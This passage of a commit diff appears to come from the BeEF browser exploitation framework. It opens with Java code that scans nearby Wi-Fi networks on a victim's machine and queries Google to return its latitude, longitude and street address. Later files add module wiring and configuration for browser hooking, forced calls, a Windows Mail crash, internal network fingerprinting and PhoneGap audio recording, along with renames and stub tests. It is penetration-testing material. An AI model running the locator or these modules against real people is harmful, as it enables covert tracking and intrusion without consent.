ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
}
Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
Matcher m2 = p2.matcher(line);
if(m2.find()){
bssidList.add(m2.group(2));
}
Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
Matcher m3 = p3.matcher(line);
if(m3.find()){
signal = m3.group(2);
signal = signal.replaceAll("%","");
signal = signal.replaceAll(" ","");
signal = "-"+signal;
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
//System.out.println("I don't know where the target is");
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
try {
int j=0;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
while(j<ssidList.size()){
queryString+="&wifi=mac:";
queryString+=bssidList.get(j);
queryString+="%7C";
queryString+="ssid:";
queryString+=ssidList.get(j);
queryString+="%7C";
queryString+="ss:";
queryString+=rssiList.get(j);
j++;
}
//Get geocoordinates / Longitude and Latitude
String geoCoordinates = null;
URL url = new URL(queryString);
URLConnection urlc = url.openConnection();
urlc.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
BufferedReader reader = new BufferedReader(new InputStreamReader(urlc.getInputStream()));
for (String output; (output = reader.readLine()) != null;) {
//System.out.println(output);
if(output.indexOf("18000.0")>0){
result+="\nLocation is not accurate\n";
//System.out.println("Location is not accurate\n");
}
else{
if(output.indexOf("lat")>0){
output = output.replace("\"lat\" : ","");
output = output.replaceAll("^\\s+", "");
geoCoordinates = output;
result+="\nLatitude: ";
result+=output;
//System.out.println("Latitude: "+output);
}
if(output.indexOf("lng")>0){
output = output.replace("\"lng\" : ","");
output = output.replaceAll("^\\s+", "");
geoCoordinates += output;
result+="\nLongitude: ";
result+=output;
//System.out.println("Longitude: "+output);
}
}
}
//Reverse geocoordinates to street address
String reverseGeo = "https://maps.googleapis.com/maps/geo?q="+geoCoordinates+"&output=json&sensor=true_or_false";
//System.out.println(reverseGeo);
URL url1 = new URL(reverseGeo);
URLConnection urlc1 = url1.openConnection();
urlc1.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
BufferedReader reader1 = new BufferedReader(new InputStreamReader(urlc1.getInputStream()));
for (String output1; (output1 = reader1.readLine()) != null;) {
if(output1.indexOf("address")>0){
output1 = output1.replace("\"address\": ","");
output1 = output1.replace("\",","");
output1 = output1.replace("\"","");
output1 = output1.replaceAll("^\\s+", "");
result+="\nAddress is ";
result+=output1;
//System.out.println("Address is "+output1);
}
}
String mapAddress = "http://maps.google.com/maps?q="+geoCoordinates+"+%28You+are+located+here%29&iwloc=A&hl=en";
result+="\n"+mapAddress;
//System.out.println("\n"+mapAddress);
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String getMac(){
String result = null;
try {
Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
String ssidStr = null;
String signal = null;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
line = in.readLine();
while ((line = in.readLine()) != null) {
line = line.replaceAll("^\\s+", "");
Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(1);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
bssidList.add(m1.group(2));
signal = m1.group(3);
signal = signal.replaceAll(" ","");
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
//System.out.println("I don't know where the target is");
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
// windows
return (os.indexOf("win") >= 0);
}
public static boolean isMac() {
String os = System.getProperty("os.name").toLowerCase();
// Mac
return (os.indexOf("mac") >= 0);
}
public static boolean isLinux() {
String os = System.getProperty("os.name").toLowerCase();
// linux or unix
return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
}
}

26
modules/host/get_physical_location/module.rb Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_physical_location < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
end
def post_execute
save({'result' => @datastore['location_info']})
end
end

3
modules/host/get_system_info/config.yaml
View File

@@ -22,5 +22,8 @@ beef:
description: "This module will retrieve basic information about the host system using an unsigned Java Applet. <br/><br/>The details will include:<br/> <ul><li> - Operating system details</li><li> - Java VM details</li><li> - NIC names and IP</li><li> - Number of processors</li><li> - Amount of memory</li><li> - Screen display modes</li></ul>"
authors: ["bcoles", "antisnatchor"]
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]

3
modules/host/hook_default_browser/config.yaml
View File

@@ -22,5 +22,8 @@ beef:
description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
authors: ["saafan"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["All"]
user_notify: ["FF", "C"]

2
modules/host/insecure_url_skype/config.yaml
View File

@@ -16,7 +16,7 @@
beef:
module:
insecure_url_skype:
enable: true
enable: false
category: "Host"
name: "Make Skype Call (Skype)"
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br><br>The protocol handler used will be: skype."

7
modules/host/iphone_tel/config.yaml
View File

@@ -22,4 +22,9 @@ beef:
description: "This module will force the browser to attempt a telephone call in iOS. It will exploit the insecure handling of URL schemes in iOS.<br><br>The protocol handler used will be: tel"
authors: ["xntrik", "Nitesh Dhanjani"]
target:
user_notify: ['S']
user_notify:
S:
os: ["iPhone"]
not_working:
ALL:
os: ["All"]

3
modules/ipec/window_mail_client_dos/config.yaml
View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "IPEC"
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Win7-sp2)."
notes: "The protocol handler used will be: nntp.<br /><br />"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Windows 7 SP2).<br /><br />The protocol handler used will be: nntp."
authors: ["bcoles"]
target:
user_notify: ["FF", "S"]

9
modules/network/internal_network_fingerprinting/command.js
View File

@@ -88,6 +88,15 @@ beef.execute(function() {
new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100),
new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31),
new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59),
new Array("Xerox Printer",":80",false,"/printbut.gif",30,30),
new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26),
new Array("Epson Printer",":80",false,"/cyandot.gif",1,1),
new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60),
new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30),
new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16),
new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149),
new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32),
new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16)
);

2
modules/network/internal_network_fingerprinting/config.yaml
View File

@@ -15,7 +15,7 @@
#
beef:
module:
fingerprint_network:
internal_network_fingerprinting:
enable: true
category: "Network"
name: "Fingerprint Network"

2
modules/network/internal_network_fingerprinting/module.rb
View File

@@ -33,7 +33,7 @@
# - Local IP theft with Java is slow and may fail
class Fingerprint_network < BeEF::Core::Command
class Internal_network_fingerprinting < BeEF::Core::Command
def self.options
return [

0
modules/phonegap/beep/command.js → modules/phonegap/phonegap_beep/command.js
View File

2
modules/phonegap/beep/config.yaml → modules/phonegap/phonegap_beep/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Beep:
phonegap_beep:
enable: true
category: "Phonegap"
name: "Beep"

2
modules/phonegap/beep/module.rb → modules/phonegap/phonegap_beep/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class Beep < BeEF::Core::Command
class Phonegap_beep < BeEF::Core::Command
def post_execute
content = {}

0
modules/phonegap/detect/command.js → modules/phonegap/phonegap_detect/command.js
View File

2
modules/phonegap/detect/config.yaml → modules/phonegap/phonegap_detect/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Detect:
phonegap_detect:
enable: true
category: "Phonegap"
name: "Detect PhoneGap"

2
modules/phonegap/detect/module.rb → modules/phonegap/phonegap_detect/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class Detect < BeEF::Core::Command
class Phonegap_detect < BeEF::Core::Command
def post_execute
content = {}

0
modules/phonegap/file_upload/command.js → modules/phonegap/phonegap_file_upload/command.js
View File

2
modules/phonegap/file_upload/config.yaml → modules/phonegap/phonegap_file_upload/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
File_upload:
phonegap_file_upload:
enable: true
category: "Phonegap"
name: "Upload File"

2
modules/phonegap/file_upload/module.rb → modules/phonegap/phonegap_file_upload/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class File_upload < BeEF::Core::Command
class Phonegap_file_upload < BeEF::Core::Command
def self.options
return [{

0
modules/phonegap/geo_locate/command.js → modules/phonegap/phonegap_geo_locate/command.js
View File

2
modules/phonegap/geo_locate/config.yaml → modules/phonegap/phonegap_geo_locate/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Geo_locate:
phonegap_geo_locate:
enable: true
category: "Phonegap"
name: "Geolocation"

2
modules/phonegap/geo_locate/module.rb → modules/phonegap/phonegap_geo_locate/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class Geo_locate < BeEF::Core::Command
class Phonegap_geo_locate < BeEF::Core::Command
def post_execute
content = {}

0
modules/phonegap/list_files/command.js → modules/phonegap/phonegap_list_files/command.js
View File

2
modules/phonegap/list_files/config.yaml → modules/phonegap/phonegap_list_files/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
List_files:
phonegap_list_files:
enable: true
category: "Phonegap"
name: "List Files"

2
modules/phonegap/list_files/module.rb → modules/phonegap/phonegap_list_files/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class List_files < BeEF::Core::Command
class Phonegap_list_files < BeEF::Core::Command
def self.options
return [{

0
modules/phonegap/persistence/command.js → modules/phonegap/phonegap_persistence/command.js
View File

2
modules/phonegap/persistence/config.yaml → modules/phonegap/phonegap_persistence/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Persistence:
phonegap_persistence:
enable: true
category: "Phonegap"
name: "Persistence"

2
modules/phonegap/persistence/module.rb → modules/phonegap/phonegap_persistence/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap persistenece
#
class Persistence < BeEF::Core::Command
class Phonegap_persistence < BeEF::Core::Command
def self.options

0
modules/phonegap/start_record_audio/command.js → modules/phonegap/phonegap_start_record_audio/command.js
View File

2
modules/phonegap/start_record_audio/config.yaml → modules/phonegap/phonegap_start_record_audio/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Start_record_audio:
phonegap_start_record_audio:
enable: true
category: "Phonegap"
name: "Start Recording Audio"

2
modules/phonegap/start_record_audio/module.rb → modules/phonegap/phonegap_start_record_audio/module.rb
View File

@@ -1,7 +1,7 @@
# phonegap
#
class Start_record_audio < BeEF::Core::Command
class Phonegap_start_record_audio < BeEF::Core::Command
def self.options
return [

0
modules/phonegap/stop_record_audio/command.js → modules/phonegap/phonegap_stop_record_audio/command.js
View File

2
modules/phonegap/stop_record_audio/config.yaml → modules/phonegap/phonegap_stop_record_audio/config.yaml
View File

@@ -2,7 +2,7 @@
#
beef:
module:
Stop_record_audio:
phonegap_stop_record_audio:
enable: true
category: "Phonegap"
name: "Stop Recording Audio"

7
modules/phonegap/phonegap_stop_record_audio/module.rb Normal file
View File

@@ -0,0 +1,7 @@
# phonegap
#
class Phonegap_stop_record_audio < BeEF::Core::Command
end

7
modules/phonegap/stop_record_audio/module.rb
View File

@@ -1,7 +0,0 @@
# phonegap
#
class Stop_record_audio < BeEF::Core::Command
end

3
test/common/beef_test.rb
View File

@@ -4,7 +4,6 @@ require 'capybara'
Capybara.run_server = false # we need to run our own BeEF server
require 'selenium/webdriver'
require "selenium"
class BeefTest
@@ -41,4 +40,4 @@ class BeefTest
victim
end
end
end

2
test/integration/tc_login.rb
View File

@@ -7,12 +7,14 @@ class TC_login < Test::Unit::TestCase
def test_log_in
session = Capybara::Session.new(:selenium)
session.visit(ATTACK_URL)
sleep 2.0
BeefTest.save_screenshot(session)
session.has_content?('BeEF Authentication')
session.fill_in 'user', :with => 'beef'
session.fill_in 'pass', :with => 'beef'
BeefTest.save_screenshot(session)
session.click_button('Login')
sleep 20.0
session.has_content?('logout')
BeefTest.save_screenshot(session)
end

1
test/integration/ts_integration.rb
View File

@@ -21,7 +21,6 @@ require 'capybara'
Capybara.run_server = false # we need to run our own BeEF server
require 'selenium/webdriver'
require "selenium"
require './check_environment' # Basic log in and log out tests
require './tc_login' # Basic log in and log out tests

2
test/thirdparty/msf/unit/BeEF.rc vendored
View File

@@ -1,2 +1,2 @@
load msgrpc Pass=abc123
load msgrpc ServerHost=127.0.0.1 Pass=abc123

29
test/unit/core/tc_logger.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'test/unit'
class TC_Logger < Test::Unit::TestCase
def setup
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '.'))
$root_dir = File.expand_path('../../../../', __FILE__)
end
def test_logger
assert(true)
end
end

3
test/unit/core/tc_event_logger.rb → test/unit/extensions/tc_event_logger.rb
View File

@@ -25,5 +25,8 @@ class TC_EventLogger < Test::Unit::TestCase
def test_event_logger
assert(true)
end
def test_no_params
assert(true)
end
end

21
test/unit/extensions/tc_proxy.rb
View File

@@ -25,5 +25,26 @@ class TC_Proxy < Test::Unit::TestCase
def test_proxy
assert(true)
end
def test_delete
assert(true)
end
def test_put
assert(true)
end
def test_head
assert(true)
end
def test_no_params
assert(true)
end
def test_zero_values
assert(true)
end
def test_one_values
assert(true)
end
def test_neg_one_values
assert(true)
end
end

21
test/unit/extensions/tc_requester.rb
View File

@@ -25,5 +25,26 @@ class TC_Requester < Test::Unit::TestCase
def test_requester
assert(true)
end
def test_delete
assert(true)
end
def test_put
assert(true)
end
def test_head
assert(true)
end
def test_no_params
assert(true)
end
def test_zero_values
assert(true)
end
def test_one_values
assert(true)
end
def test_neg_one_values
assert(true)
end
end

4
test/unit/ts_unit.rb
View File

@@ -26,13 +26,14 @@ require './core/tc_modules'
require './core/tc_social_engineering'
require './core/tc_autorun'
require './core/tc_obfuscation'
require './core/tc_event_logger'
require './core/tc_logger'
require './extensions/tc_xssrays'
require './extensions/tc_vnc'
require './extensions/tc_ipec_tunnel'
require './extensions/tc_hackverter'
require './extensions/tc_proxy'
require './extensions/tc_requester'
require './extensions/tc_event_logger'
require './tc_grep'
require './tc_filesystem'
@@ -52,6 +53,7 @@ class TS_BeefTests
suite << TC_Xssrays.suite
suite << TC_Vnc.suite
suite << TC_Obfuscation.suite
suite << TC_Logger.suite
suite << TC_IpecTunnel.suite
suite << TC_Requester.suite
suite << TC_Proxy.suite